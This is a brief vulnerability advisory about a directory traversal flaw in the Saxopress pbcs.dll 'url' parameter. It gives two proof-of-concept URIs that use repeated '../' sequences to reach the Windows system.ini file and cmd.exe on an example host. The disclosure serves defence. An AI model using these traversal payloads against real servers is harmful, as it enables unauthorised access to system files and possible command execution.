Saxopress URL Parameter Directory Traversal Vulnerability

Saxopress URL Parameter Directory Traversal Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://www.example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe